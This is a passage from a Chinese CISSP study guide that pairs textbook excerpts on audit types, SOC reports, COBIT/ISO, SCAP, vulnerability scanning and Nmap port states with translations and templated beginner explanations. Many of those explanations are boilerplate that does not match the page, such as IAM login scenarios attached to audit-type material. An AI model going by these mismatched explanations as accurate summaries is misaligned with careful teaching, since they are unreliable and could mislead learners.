在许多组织中,首席 审计执行官直接向总裁、首席执行官(CEO)或类似职位汇报。 首席审计执行 官(CAE)也可能直接向组织的治理委员会汇报。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 09 / PDF P1037

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

External Audits External audits are performed by an outside auditing firm. These audits have a high degree of external validity because the auditors performing the assessment theoretically have no conflict of interest with the organization itself. There are thousands of firms that perform external audits, but most large organizations use the so-called Big Four audit firms: Ernst & Young Deloitte PricewaterhouseCoopers KPMG Audits performed by these firms are generally considered acceptable by most investors and governing body members. Third-Party Audits Third-party audits are conducted by, or on behalf of, another organization.

For example, a regulatory body might have the authority to initiate an audit of a regulated firm under contract or law. In the case of a third-party audit, the organization initiating the audit generally selects the auditors and designs the scope of the audit. Exam Tip As you prepare for the exam, it may be helpful to remember that these three types of audits differ in who controls them. Internal audits are under the organization's control. External audits are performed by an independent firm that is outside the organization's control but the auditor is still hired by the organization.

Third-party audits are performed by a firm that is hired by another organization, so they are outside the enterprise's control. Organizations that provide services to other organizations are frequently asked to participate in third-party audits. This can be quite a burden on the audited organization if they have a large number of clients. The American Institute of Certified Public Accountants (AICPA) released a standard designed to alleviate this burden. The Statement on Standards for Attestation

中文直译 / 整理

外部审计 外部审计由外部审计公司执行。 这些审计具有高度的外部有效性,因为执行评 估的审计师理论上与组织本身不存在利益冲突。 有成千上万家公司从事外部审 计,但大多数大型组织都使用所谓的“四大”审计公司: 安永 德勤 普华永道 KPMG 这些公司进行的审计通常被大多数投资者和监管机构成员视为可接受的。 第三方审计 第三方审计由另一组织或其代表进行。 例如,监管机构可能根据合同或法律拥 有对受监管企业启动审计的权力。 在第三方审计的情况下,发起审计的组织通 常会选择审计师并设计审计范围。 考试提示 在准备考试时,记住这三种审计类型在控制方上的区别可能会有所帮助。 内 部审计由组织控制; 外部审计由独立于组织控制之外的公司执行,但审计师 仍由组织聘用; 第三方审计由另一组织聘用的公司执行,因此超出了企业的 控制范围。 为其他组织提供服务的组织经常被要求参与第三方审计。 如果被审计组织拥有 大量客户,这可能会带来相当大的负担。 美国注册会计师协会(AICPA)发布 了一项标准,旨在减轻这一负担。 《鉴证业务准则》

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

标准:标准给出必须满足的最低要求。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Minimum level、mandatory requirement 常对应 standard。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 10 / PDF P1038

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Engagements document 18 (SSAE 18), titled Attestation Standards: Clarification and Recodification, provides a common standard to be used by auditors performing assessments of service organizations with the intent of allowing the organization to conduct an external assessment instead of multiple third-party assessments and then sharing the resulting report with customers and potential customers. Outside of the United States, similar engagements are conducted under the International Standard on Assurance Engagements (ISAE) 3402, Assurance Reports on Controls at a Service Organization.

SSAE 18 and ISAE 3402 engagements are commonly referred to as system and organization controls (SOC) audits, and they come in three forms: SOC 1 Engagements Assess the organization's controls that might impact the accuracy of financial reporting. SOC 2 Engagements Assess the organization's controls that affect the security (confidentiality, integrity, and availability) and privacy of information stored in a system. SOC 2 audit results are confidential and are normally only shared outside the organization under an NDA. SOC 3 Engagements Assess the organization's controls that affect the security (confidentiality, integrity, and availability) and privacy of information stored in a system.

However, SOC 3 audit results are intended for public disclosure. In addition to the three categories of SOC assessment, there are two different types of SOC report. Both reports begin with providing a description by management of the controls put in place. They differ in the scope of the opinion provided by the auditor: Type I Reports These reports provide the auditor's opinion on the description provided by management and the suitability of the design of the controls. Type I reports also cover only a specific point in time, rather than an extended period.

You can think of the Type I report as more of a documentation review where the auditor is checking things out on paper and making sure that the controls described by management are reasonable and appropriate. Type II Reports These reports go further and also provide the auditor's opinion on the operating effectiveness of the controls. That is, the auditor actually confirms that the controls are functioning properly. The Type II report also covers an extended period of time: at least six months of

中文直译 / 整理

第18号鉴证业务准则 (SSAE 18),标题为 鉴证准则:澄清与重新编纂,为执 行服务组织评估的审计师提供了一个统一标准,目的是使组织能够进行一次 外部评估,而非多次第三方评估,然后将生成的报告与客户及潜在客户共享。 在美国以外,类似的工作依据《国际鉴证业务准则》(ISAE)3402 服务组织 控制的鉴证报告 进行。 SSAE 18 和 ISAE 3402 业务通常被称为 系统与组织控制(SOC) 审计,它们 有三种形式: SOC 1 业务 评估可能影响财务报告准确性的组织控制。 SOC 2 业务 评估影响系统中存储信息的安全性(机密性、完整性和可用性) 和隐私的组织控制。 SOC 2 审计结果属于机密信息,通常仅在签署保密协议 (NDA)后才向组织外部共享。 SOC 3 业务 评估影响系统中存储信息的安全性(机密性、完整性和可用性)和隐 私的组织控制。 然而,SOC 3 审计结果旨在公开披露。 除了 SOC 评估的三类之外,还有两种不同类型的 SOC 报告。 这两种报告均以 管理层对所实施控制的描述开始,其区别在于审计师提供的意见范围: Type I 报告 这些报告提供审计师对管理层所描述内容及控制设计适当性的意见。

Type I 报告仅涵盖某一特定时间点,而非一个较长时期。 您可以将 Type I 报告 视为一种文档审查,审计师在此过程中检查书面材料,以确保管理层描述的控制 措施合理且恰当。 II类报告这些报告更进一步,还提供了审计师对控制措施运行有效性的意见。 也就是说,审计师实际确认了控制措施运作正常。 II类报告还涵盖了一个更长 的时间段:至少六个月的

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 11 / PDF P1039

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

operation. You can think of the Type II report as more like a traditional audit. The auditors are not just checking the paperwork; they are also going in and verifying that the controls function properly. Type II reports are considered much more reliable than Type I reports because they include independent testing of controls. Type I reports simply take the service organization at their word that the controls are implemented as described. Information security professionals are often asked to participate in internal, external, and third-party audits. They commonly must provide information about security controls to auditors through interviews and written documentation.

Auditors may also request the participation of security staff members in the execution of control evaluations. Auditors generally have carte blanche access to all information within an organization, and security staff should comply with those requests, consulting with management as needed. When Audits Go Wrong The Big Four didn't come into being until 2002. Up until that point, the Big Five also included the highly respected firm Arthur Andersen. Andersen, however, collapsed suddenly after they were implicated in the downfall of Enron Corporation.

Enron, an energy company, suddenly filed for bankruptcy in 2001 after allegations of systemic accounting fraud came to the attention of regulators and the media. Arthur Andersen, then one of the world's largest auditing firms, had performed Enron's financial audits, effectively signing off on their fraudulent practices as legitimate. The firm was later convicted of obstruction of justice and, although the conviction was later overturned by the Supreme Court, quickly collapsed due to the loss of credibility they suffered in the wake of the Enron scandal and other allegations of fraudulent behavior. Auditing Standards

中文直译 / 整理

运营。 您可以将II类报告视为更接近传统审计。 审计师不仅检查书面文件,还 会深入核实控制措施是否正常运作。 II类报告被认为比I类报告可靠得多,因为它们包含了对控制措施的独立测试。 I类报告仅依赖服务组织的陈述,即控制措施已按描述实施。 信息安全专业人员经常被要求参与内部、外部和第三方审计。 他们通常需要 通过面谈和书面文档向审计人员提供有关安全控制措施的信息。 审计人员还 可能要求安全人员参与控制评估的执行。 审计人员通常可以无限制地访问组 织内的所有信息,安全人员应配合这些请求,必要时咨询管理层。 审计出错时 四大事务所直到2002年才形成。 在此之前,五大事务所还包括声誉卓著的 安达信公司。 然而,安达信在卷入安然公司倒闭事件后突然崩溃。 安然公司 是一家能源企业,于2001年在监管机构和媒体关注到其系统性会计欺诈指 控后突然申请破产。 当时世界最大的审计公司之一安达信曾为安然公司进行财务审计,实际上 为其欺诈行为签发了合法证明。 该公司后来被判定犯有妨碍司法公正罪, 尽管该判决后来被最高法院推翻,但由于在安然丑闻及其他欺诈行为指控 后声誉受损,公司迅速倒闭。 审计准则

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

标准:标准给出必须满足的最低要求。

审计:审计检查控制是否存在、是否有效、是否符合要求。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Minimum level、mandatory requirement 常对应 standard。

审计题关注独立性、证据、范围和报告。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
标准 标准给出必须满足的最低要求。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 12 / PDF P1040

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

When conducting an audit or assessment, the team performing the review should be clear about the standard that they are using to assess the organization. The standard provides the description of control objectives that should be met, and then the audit or assessment is designed to ensure that the organization properly implemented controls to meet those objectives. One common framework for conducting audits and assessments is the Control Objectives for Information and Related Technologies (COBIT). COBIT describes the common requirements that organizations should have in place surrounding their information systems.

The COBIT framework is maintained by ISACA and is available at www.isaca.org/resources/cobit. The International Organization for Standardization (ISO) also publishes a set of standards related to information security. ISO 27001 describes a standard approach for setting up an information security management system, and ISO 27002 goes into more detail on the specifics of information security controls. These internationally recognized standards are widely used within the security field, and organizations may choose to become officially certified as compliant with ISO 27001.

Performing Vulnerability Assessments Vulnerability assessments are some of the most important testing tools in the information security professional's toolkit. Vulnerability scans and penetration tests provide security professionals with a perspective on the weaknesses in a system or application's technical controls by identifying technical vulnerabilities that they contain. Vulnerabilities are weaknesses in systems and security controls that might be exploited by a threat. Vulnerability assessments examine systems for these weaknesses, commonly using automated means, and help security professionals develop a roadmap for remediating those that pose an unacceptable risk to the business.

Describing Vulnerabilities The security community depends on a common set of standards to provide a common language for describing and evaluating vulnerabilities. NIST provides the community with the Security Content Automation Protocol (SCAP) to meet this need. SCAP provides this common framework for discussion and also facilitates the automation of interactions between different security systems. The components of SCAP most directly related to vulnerability assessment include these:

中文直译 / 整理

在进行审计或评估时,执行审查的团队应明确他们所依据的标准。 该标准描述 了应达到的控制目标,随后审计或评估的设计旨在确保组织正确实施了控制措 施以实现这些目标。 一种常见的审计和评估框架是信息及相关技术的控制目标(COBIT)。 COBIT 描述了组织在其信息系统周围应具备的常见要求。 COBIT 框架由 ISACA 维护,可在www.isaca.org/resources/cobit获取。 国际标准化组织(ISO)也发布了一系列与信息安全相关的标准。 ISO 27001 描 述了建立信息安全管理体系的标准方法,而 ISO 27002 则更详细地阐述了信息 安全控制的具体内容。 这些国际公认的标准在安全领域被广泛使用,组织可以 选择获得 ISO 27001 合规性的正式认证。 执行漏洞评估 漏洞评估是信息安全专业人员工具箱中最重要的测试工具之一。 漏洞扫描和渗 透测试通过识别系统或应用程序技术控制中的技术漏洞,为安全专业人员提供 有关其弱点的视角。 漏洞是指系统和安全控制中可能被威胁利用的弱点。 漏洞 评估通常使用自动化手段检查系统中的这些弱点,帮助安全专业人员制定修复 对业务构成不可接受风险的漏洞的路线图。

描述漏洞 安全社区依赖一套共同的标准,以提供描述和评估漏洞的通用语言。 NIST 为 社区提供 安全内容自动化协议(SCAP) 来满足这一需求。 SCAP 为此类讨论 提供了通用框架,并促进了不同安全系统之间的自动化交互。 与漏洞评估最直 接相关的 SCAP 组件包括以下内容:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

认证:认证是验证“你是不是你声称的那个人”。

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

密码、令牌、生物特征、多因素认证都服务认证。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
认证 认证是验证“你是不是你声称的那个人”。
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
COBIT COBIT 偏 IT 治理和控制目标。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 13 / PDF P1041

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Common Vulnerabilities and Exposures (CVE) provides a naming system for describing security vulnerabilities. Common Vulnerability Scoring System (CVSS) provides a standardized scoring system for describing the severity of security vulnerabilities. Common Configuration Enumeration (CCE) provides a naming system for system configuration issues. Common Platform Enumeration (CPE) provides a naming system for operating systems, applications, and devices. Extensible Configuration Checklist Description Format (XCCDF) provides a language for specifying security checklists. Open Vulnerability and Assessment Language (OVAL) provides a language for describing security testing procedures.

For more information on SCAP, see the NIST website at http://csrc.nist.gov/Projects/Security-Content-AutomationProtocol. Vulnerability Scans Vulnerability scans automatically probe systems, applications, and networks, looking for weaknesses that may be exploited by an attacker. The scanning tools used in these tests provide quick, point-and-click tests that perform otherwise tedious tasks without requiring manual intervention. Most tools allow scheduled scanning on a recurring basis and provide reports that show differences between scans performed on different days, offering administrators a view into changes in their security risk environment.

There are four main categories of vulnerability scans: network discovery scans, network vulnerability scans, web application vulnerability scans, and database vulnerability scans. A wide variety of tools perform each of these types of scans.

中文直译 / 整理

通用漏洞和暴露(CVE)提供了一种用于描述安全漏洞的命名系统。 通用漏洞评分系统(CVSS)提供了一种用于描述安全漏洞严重程度的标准化 评分系统。 通用配置枚举(CCE)提供了一种用于系统配置问题的命名系统。 通用平台枚举(CPE)提供了一种用于操作系统、应用程序和设备的命名 系统。 可扩展配置检查列表描述格式(XCCDF)提供了一种用于指定安全检 查列表的语言。 开放漏洞与评估语言(OVAL)提供了一种用于描述安全测试过程的语 言。 有关 SCAP 的更多信息,请参阅 NIST 网站: http://csrc.nist.gov/Projects/Security-Content-AutomationProtocol. 漏洞扫描 漏洞扫描会自动探测系统、应用程序和网络,查找可能被攻击者利用的弱 点。 这些测试中使用的扫描工具提供快速的点按式测试,能够无需人工干预即 可完成原本繁琐的任务。 大多数工具支持定期安排扫描,并提供报告,显示不 同日期扫描结果之间的差异,为管理员提供对其安全风险环境变化的全面视图。 漏洞扫描主要有四类:网络发现扫描、网络漏洞扫描、Web应用程序漏洞扫 描和数据库漏洞扫描。

各种工具均可执行这些类型的扫描。

小白解释

场景先行:你是公司的安全负责人,正在读第 1041 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 14 / PDF P1042

第 1042 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Remember that information security professionals aren't the only ones with access to vulnerability testing tools. Attackers have access to the same tools used by the “good guys” and often run vulnerability tests against systems, applications, and networks prior to an intrusion attempt. These scans help malicious actors zero in on vulnerable systems and focus their attacks on systems where they will have the greatest likelihood of success. Network Discovery Scanning Network discovery scanning uses a variety of techniques to scan a range of IP addresses, searching for systems with open network ports.

Network discovery scanners do not actually probe systems for vulnerabilities but provide a report showing the systems detected on a network and the list of ports that are exposed through the network and server firewalls that lie on the network path between the scanner and the scanned system. Network discovery scanners use many different techniques to identify open ports on remote systems. Some of the more common techniques are as follows: TCP SYN Scanning Sends a single packet to each scanned port with the SYN flag set. This indicates a request to open a new connection.

If the scanner receives a response that has the SYN and ACK flags set, this indicates that the system is moving to the second phase in the three-way TCP handshake and that the port is open. TCP SYN scanning is also known as “half-open” scanning. TCP Connect Scanning Opens a full connection to the remote system on the specified port. This scan type is used when the user running the scan does not have the necessary permissions to run a half-open scan. Most other scan types require the ability to send raw packets, and a user may be restricted by the operating system from sending handcrafted packets.

TCP ACK Scanning Sends a packet with the ACK flag set, indicating that it is part of an open connection. This type of scan may be done in an attempt to determine the rules enforced by a firewall and the firewall methodology. UDP Scanning Performs a scan of the remote system using the UDP protocol, checking for active UDP services. This scan type does not use the

中文直译 / 整理

请记住,信息安全部门的专业人员并非唯一能使用漏洞测试工具的人。 攻击者也能访问与“好人”相同的工具,并经常在入侵尝试前对系统、应用 程序和网络进行漏洞测试。 这些扫描有助于恶意行为者精准定位易受攻击的 系统,并集中攻击那些最有可能成功的系统。 网络发现扫描 网络发现扫描使用多种技术扫描一系列IP地址,以查找具有开放网络端口的系 统。 网络发现扫描器并不会实际探测系统的漏洞,而是提供一份报告,显示网 络上检测到的系统以及在扫描器与被扫描系统之间网络路径上的网络和服务器 防火墙所暴露的端口列表。 网络发现扫描器使用多种不同技术来识别远程系统上的开放端口。 一些更常 见的技术如下: TCP SYN扫描 向每个被扫描的端口发送一个设置了SYN标志的单个数据包。 这 表示请求建立新连接。 如果扫描器收到一个设置了SYN和ACK标志的响应,则表 示系统正在进入TCP三次握手的第二阶段,且该端口是开放的。 TCP SYN扫描也 被称为“半开放”扫描。 TCP连接扫描 在指定端口上与远程系统建立完整连接。 当执行扫描的用户没有运 行半开放扫描所需权限时,会使用此扫描类型。

大多数其他扫描类型需要发送原 始数据包的能力,而用户可能因操作系统限制而无法发送自定义数据包。 TCP ACK 扫描 发送一个设置了 ACK 标志的数据包,表明其属于一个已建立的 连接。 这种扫描可能用于尝试确定防火墙所执行的规则和防火墙机制。 UDP 扫描 使用 UDP 协议对远程系统进行扫描,以检查活动的 UDP 服务。 此 扫描类型不使用

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1042 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 15 / PDF P1043

第 1043 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

three-way handshake, because UDP is a connectionless protocol. Xmas Scanning Sends a packet with the FIN, PSH, and URG flags set. A packet with so many flags set is said to be “lit up like a Christmas tree,” leading to the scan's name. If you've forgotten how the three-way TCP handshake functions, you'll find complete coverage of it in Chapter 11, “Secure Network Architecture and Components.” The most common tool used for network discovery scanning is an open source tool called Nmap. Originally released in 1997, Nmap is, remarkably, still maintained and in general use today.

It remains one of the most popular network security tools, and almost every security professional either uses Nmap regularly or has used it at some point in their career. You can download a free copy of Nmap or learn more about the tool at http://nmap.org. When Nmap scans a system, it identifies the current state of each network port on the system. For ports where Nmap detects a result, it provides the current status of that port: Open The port is open on the remote system and there is an application that is actively accepting connections on that port.

Closed The port is accessible on the remote system, meaning that the firewall is allowing access, but there is no application accepting connections on that port. Filtered Nmap is unable to determine whether a port is open or closed because a firewall is interfering with the connection attempt. Unfiltered The port is accessible, but Nmap cannot determine whether it is open or closed. It is unfiltered because the port is exposed to the packet probes sent by Nmap, but no conclusive evidence can determine the port's status. Open | Filtered Nmap cannot establish whether the port is open or filtered.

This state occurs when a port does not respond to Nmap's probes, which could be due to packet filtering preventing Nmap's requests from reaching the port, or the port is open but designed not to respond to the probes used by Nmap.

中文直译 / 整理

三次握手,因为 UDP 是一种无连接协议。 Xmas Scanning 发送一个设置了FIN、PSH和URG标志的数据包。 如此多标志被 设置的数据包被称为“像圣诞树一样亮起”,这也是该扫描方式名称的由来。 如果你忘记了三次TCP握手的工作原理,你可以在第11章“安 全网络架构与组件”中找到完整介绍。 用于网络发现扫描最常用的工具是一个名为Nmap的开源工具。 Nmap最初发 布于1997年,令人惊讶的是,至今仍被维护并广泛使用。 它仍然是最受欢迎的 网络安全工具之一,几乎每一位安全专业人士都曾定期使用过Nmap,或在其 职业生涯中的某个阶段使用过它。 你可以免费下载Nmap或在http://nmap.org 了解有关该工具的更多信息。 当Nmap扫描系统时,它会识别系统上每个网络端口的当前状态。 对于 Nmap检测到结果的端口,它会提供该端口的当前状态: 开放 该端口在远程系统上是开放的,并且有一个应用程序正在该端口上主动接受 连接。 关闭 该端口在远程系统上可访问,意味着防火墙允许访问,但没有应用程序在 该端口上接受连接。 被过滤 由于防火墙干扰了连接尝试,Nmap 无法确定端口是开放还是关闭。

未过滤 该端口可访问,但 Nmap 无法确定其是开放还是关闭。 它被标记为未过 滤,是因为端口暴露在 Nmap 发送的数据包探测下,但没有确凿证据能确定端 口的状态。 打开 | 过滤 Nmap 无法确定端口是开放还是被过滤。 当端口未对 Nmap 的 探测做出响应时,会出现此状态,这可能是由于数据包过滤阻止了 Nmap 的 请求到达端口,或者端口是开放的,但设计为不响应 Nmap 所使用的探测方 式。

小白解释

